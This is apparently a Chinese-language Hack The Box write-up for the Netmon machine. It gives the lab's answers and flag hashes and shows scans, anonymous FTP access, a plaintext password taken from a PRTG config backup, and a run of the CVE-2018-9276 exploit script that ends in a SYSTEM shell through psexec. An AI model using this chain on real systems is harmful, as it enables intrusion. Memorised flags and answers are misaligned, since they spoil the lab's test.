目录
1.What is the name of the application running on port 80? Given the three words in the logo.
2.What service is running on TCP port 21?
3.Submit the flag located on the Public user's desktop.
知道了靶机开放了哪些端口,接下来用nmap单独对这些端口进行脚本服务扫描
USER_FLAG:c0ee82f7d9d81b46ef1f1798df6f5c9f
5.What is the name of the backup config file?
6.What was the prtgadmin user's password according to that file?
7.What is the prtgadmin user's password on the website now?
8.What version of PRTG is installed?
9.Which user is this software running as by default? Don't include anything before a \.
10.Submit the flag located on the administrator's desktop.
ROOT_FLAG:5c015c28bfab41b355444909d4fd0509
连接至HTB服务器并启动靶机
靶机IP:10.10.10.152
分配IP:10.10.16.7
1.What is the name of the application running on port 80? Given the three words in the logo.
使用nmap对靶机80端口进行脚本、服务信息扫描:
nmap -p 80 -sCV {TARGET_IP}
由扫描结果可知,该WebAPP名称为:PRTG Network Monitor
2.What service is running on TCP port 21?
使用nmap对靶机21端口进行脚本、服务信息扫描:
nmap -p 21 -sC -sV {TARGET_IP}
由扫描结果可知,该端口托管服务为:ftp
3.Submit the flag located on the Public user's desktop.
我先对靶机端口进行扫描,先知道开启了哪些端口,使用fscan速度会比较快:
┌──(root㉿kali)-[/home/kali/Desktop]
└─# fscan -nopoc -nobr -no -h 10.10.10.152___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
10.10.10.152:80 open
10.10.10.152:21 open
10.10.10.152:135 open
10.10.10.152:139 open
10.10.10.152:445 open
[*] alive ports len is: 5
start vulscan
[*] WebTitle http://10.10.10.152 code:302 len:0 title:None 跳转url: http://10.10.10.152/index.htm
[*] NetInfo
[*]10.10.10.152
[->]netmon
[->]10.10.10.152
[->]dead:beef::397e:d785:b7a2:2d2d
[*] WebTitle http://10.10.10.152/index.htm code:200 len:33628 title:Welcome | PRTG Network Monitor (NETMON)
已完成 5/5
[*] 扫描结束,耗时: 4.476236249s
知道了靶机开放了哪些端口,接下来用nmap单独对这些端口进行脚本服务扫描
使用nmap指定端口,进行脚本、服务信息扫描:
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -p 21,80,135,139,445 -sCV 10.10.10.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 08:25 EDT
Nmap scan report for 10.10.10.152
Host is up (0.12s latency).PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19 12:18AM 1024 .rnd
| 02-25-19 10:15PM <DIR> inetpub
| 07-16-16 09:18AM <DIR> PerfLogs
| 02-25-19 10:56PM <DIR> Program Files
| 02-03-19 12:28AM <DIR> Program Files (x86)
| 02-03-19 08:08AM <DIR> Users
|_11-10-23 10:20AM <DIR> Windows
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-server-header: PRTG/18.1.37.13946
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windowsHost script results:
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -11m39s, deviation: 0s, median: -11m39s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-10-13T12:14:31
|_ start_date: 2024-10-13T12:07:50Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.57 seconds
首先尝试用匿名身份(Anonymous)登录靶机FTP服务器:
连接成功后,进入Users\Public\Desktop路径下,下载user.txt文件到本地
┌──(root㉿kali)-[/home/kali/Desktop]
└─# ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:kali): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||50235|)
125 Data connection already open; Transfer starting.
02-03-19 12:18AM 1024 .rnd
02-25-19 10:15PM <DIR> inetpub
07-16-16 09:18AM <DIR> PerfLogs
02-25-19 10:56PM <DIR> Program Files
02-03-19 12:28AM <DIR> Program Files (x86)
02-03-19 08:08AM <DIR> Users
11-10-23 10:20AM <DIR> Windows
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||50236|)
125 Data connection already open; Transfer starting.
02-25-19 11:44PM <DIR> Administrator
01-15-24 11:03AM <DIR> Public
226 Transfer complete.
ftp> cd Administrator
550 Access is denied.
ftp> dir
229 Entering Extended Passive Mode (|||50237|)
125 Data connection already open; Transfer starting.
02-25-19 11:44PM <DIR> Administrator
01-15-24 11:03AM <DIR> Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> cd Desktop
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||50239|)
125 Data connection already open; Transfer starting.
02-03-19 12:18AM 1195 PRTG Enterprise Console.lnk
02-03-19 12:18AM 1160 PRTG Network Monitor.lnk
10-13-24 08:08AM 34 user.txt
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||50249|)
125 Data connection already open; Transfer starting.
100% |********************************************************************| 34 0.22 KiB/s 00:00 ETA
226 Transfer complete.
34 bytes received in 00:00 (0.15 KiB/s)
ftp> exit
221 Goodbye.
回到本机,查看user.txt文件内容
cat user.txtUSER_FLAG:c0ee82f7d9d81b46ef1f1798df6f5c9f
4.What is the full path of the folder where PRTG Network Monitor saves its configuration files by default?
题目国产化后:PRTG Network Monitor 软件默认保存配置文件的文件夹的完整路径是什么?
PRTG Network Monitor默认保存配置文件路径为:
C:\ProgramData\Paessler\PRTG Network Monitor
5.What is the name of the backup config file?
重新使用匿名身份连接至靶机FTP服务器中:
ftp {TARGET_IP}
列出当前目录下所有文件夹:
ls -a
进入ProgramData目录下:
cd ProgramData列出该文件夹下所有文件:
ls -aftp> ls -a
229 Entering Extended Passive Mode (|||49870|)
150 Opening ASCII mode data connection.
02-03-19 08:05AM <DIR> Application Data
12-15-21 10:40AM <DIR> Corefig
02-03-19 08:05AM <DIR> Desktop
02-03-19 08:05AM <DIR> Documents
02-03-19 12:15AM <DIR> Licenses
11-20-16 10:36PM <DIR> Microsoft
02-03-19 12:18AM <DIR> Paessler
02-03-19 08:05AM <DIR> regid.1991-06.com.microsoft
07-16-16 09:18AM <DIR> SoftwareDistribution
02-03-19 08:05AM <DIR> Start Menu
02-03-19 12:15AM <DIR> TEMP
02-03-19 08:05AM <DIR> Templates
11-20-16 10:19PM <DIR> USOPrivate
11-20-16 10:19PM <DIR> USOShared
02-25-19 10:56PM <DIR> VMware
226 Transfer complete.
进入Paessler目录下:
cd Paessler列出该目录下所有文件:
ls -a进入PRTG Network Monitor目录下:
cd "PRTG Network Monitor"列出该目录下所有文件:
ls -aftp> cd Paessler
250 CWD command successful.
ftp> ls -a
229 Entering Extended Passive Mode (|||49892|)
125 Data connection already open; Transfer starting.
10-14-24 12:24AM <DIR> PRTG Network Monitor
226 Transfer complete.
ftp> cd "PRTG Network Monitor"
250 CWD command successful.
ftp> ls -a
229 Entering Extended Passive Mode (|||49902|)
125 Data connection already open; Transfer starting.
10-14-24 12:23AM <DIR> Configuration Auto-Backups
10-14-24 12:23AM <DIR> Log Database
02-03-19 12:18AM <DIR> Logs (Debug)
02-03-19 12:18AM <DIR> Logs (Sensors)
02-03-19 12:18AM <DIR> Logs (System)
10-14-24 12:23AM <DIR> Logs (Web Server)
10-14-24 12:23AM <DIR> Monitoring Database
02-25-19 10:54PM 1189697 PRTG Configuration.dat
02-25-19 10:54PM 1189697 PRTG Configuration.old
07-14-18 03:13AM 1153755 PRTG Configuration.old.bak
10-14-24 12:24AM 1639759 PRTG Graph Data Cache.dat
02-25-19 11:00PM <DIR> Report PDFs
02-03-19 12:18AM <DIR> System Information Database
02-03-19 12:40AM <DIR> Ticket Database
02-03-19 12:18AM <DIR> ToDo Database
226 Transfer complete.
在该目录下,可以看到备份文件:PRTG Configuration.old.bak
6.What was the prtgadmin user's password according to that file?
将该备份文件下载到本地:
get "PRTG Configuration.old.bak"
退出FTP服务器:
exit查看该备份文件内容:
cat PRTG Configuration.old.bak
账户:prtgadmin
密码:PrTg@dmin2018
7.What is the prtgadmin user's password on the website now?
考虑到从上文获取凭证是备份文件,而密码可能每隔一段时间就会进行更换
我们尝试将密码格式进行修改,如:PrTg@dmin2017、PrTg@dmin2019、PrTg@dmin2020
最终的Website正确凭证:
账户:prtgadmin
密码:PrTg@dmin2019
8.What version of PRTG is installed?
使用上文凭证,对网页进行登录:
在左下角Update Available一栏,可以看到当前版本为:18.1.37.13946
9.Which user is this software running as by default? Don't include anything before a \.
对该版本的PRTG进行漏洞搜索:
searchsploit PRTG
将第一个EXP复制到本地:
searchsploit -m windows/webapps/46527.sh┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m windows/webapps/46527.sh
Exploit: PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution
URL: https://www.exploit-db.com/exploits/46527
Path: /usr/share/exploitdb/exploits/windows/webapps/46527.sh
Codes: CVE-2018-9276
Verified: False
File Type: Bourne-Again shell script, ASCII text executable, with very long lines (2429)
Copied to: /home/kali/Desktop/temp/46527.sh
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ls
46527.sh
可以看到该漏洞的CVE编号为:CVE-2018-9276
浏览器中使用凭证对页面登陆后
使用Cookie-Editor插件查看Cookie值:
通过strings命令查看脚本内容,可知配置参数至少需要Cookie&URL,尝试直接运行该脚本:
./46527.sh -u http://{TARGET_IP} -c {YOUR_COOKIE}
提示用户创建成功,相关凭证如下:
账户:pentest
密码:P3nT3st!
利用psexec.py脚本对靶机进行连接:
python psexec.py pentest:'P3nT3st!'@{TARGET_IP}
通过执行whoami命令可见,当前用户身份为:system
10.Submit the flag located on the administrator's desktop.
切换到C盘目录下:
cd /查找root.txt文件:
dir /s root.txt查看root.txt文件内容:
type C:\Users\Administrator\Desktop\root.txtC:\Windows\system32> cd /
C:\> dir /s root.txt
Volume in drive C has no label.
Volume Serial Number is 0EF5-E5E5Directory of C:\Users\Administrator\Desktop
10/14/2024 12:23 AM 34 root.txt
1 File(s) 34 bytesTotal Files Listed:
1 File(s) 34 bytes
0 Dir(s) 6,739,435,520 bytes freeC:\> type C:\Users\Administrator\Desktop\root.txt
5c015c28bfab41b355444909d4fd0509
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
